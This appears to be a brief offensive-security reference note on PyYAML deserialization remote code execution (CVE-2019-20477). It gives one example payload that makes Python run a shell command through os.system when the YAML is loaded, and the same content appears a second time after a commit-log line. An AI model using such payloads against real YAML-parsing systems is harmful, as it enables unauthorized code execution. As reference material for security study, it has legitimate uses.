killchain-compendium/Exploits/Web/YAML Deserialization.md

# YAML Deserialization

* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
* RCE via Yaml execution by Python

* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)

## Usage

* Example Payload insid foo.yaml gets executed via Python
```sh
!!python/object/apply:os.system ["id"]
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# YAML Deserialization`

			`* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)`
			`* RCE via Yaml execution by Python`

			`* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)`

			`## Usage`

			`* Example Payload insid foo.yaml gets executed via Python`
			```sh
			`!!python/object/apply:os.system ["id"]`
			```